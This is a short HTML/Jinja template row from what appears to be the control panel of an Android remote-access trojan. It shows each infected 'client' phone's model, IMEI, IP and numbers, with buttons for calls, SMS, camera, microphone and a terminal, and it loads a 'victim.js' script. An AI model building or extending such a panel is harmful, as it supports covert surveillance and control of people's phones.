<tr class="client-{{ data[1] }}">
    <td class="model-{{ data[1] }}">{{ data[0] }}</td>
    <td class="device-id-{{ data[1] }}">{{ data[1] }}</td>
    <td class="ip-address-{{ data[1] }}">{{ data[2] }}</td>
    <td class="api-{{ data[1] }}">{{ data[3] }}</td>
    <td class="imei-{{ data[1] }}">{{ data[4] }}</td>
    <td class="phone-{{ data[1] }}">{{ data[6] }}</td>
    <td class="phone-{{ data[1] }}">{{ data[7] }}</td>
    <td class="phone-{{ data[1] }}">{{ data[8] }}</td>
    <td class="text-end">
        <button class="btn btn-outline-success btn-rounded btn-phone-{{ data[1] }}"><i class="fas fa-phone"></i></button>
        <button class="btn btn-outline-primary btn-rounded btn-sms-{{ data[1] }}"><i class="fas fa-sms"></i></button>
        <button class="btn btn-outline-secondary btn-rounded btn-camera-{{ data[1] }}"><i class="fas fa-camera"></i></button>
        <button class="btn btn-outline-info btn-rounded btn-microphone-{{ data[1] }}"><i class="fas fa-microphone"></i></button>
        <button class="btn btn-outline-dark btn-rounded btn-terminal-{{ data[1] }}"><i class="fas fa-terminal"></i></button>
        <span class="dropdown">
            <button class="btn btn-outline-secondary btn-rounded dropdown-toggle" type="button" id="dropdownMenuButton-{{ data[1] }}" data-bs-toggle="dropdown" aria-expanded="false"></button>
            <ul class="dropdown-menu" aria-labelledby="dropdownMenuButton-{{ data[1] }}">
              <li><a class="dropdown-item" id="test-connection-{{ data[1] }}"><i class="fas fa-wifi" style="color: yellowgreen;"></i> Test Connection</a></li>
              <li><a class="dropdown-item" id="remove-{{ data[1] }}"><i class="fas fa-trash" style="color: red;"></i> Remove Client</a></li>
            </ul>
        </div>
    </td>
</tr>

<script src="{{ url_for('static', filename='assets/js/victim.js') }}"></script>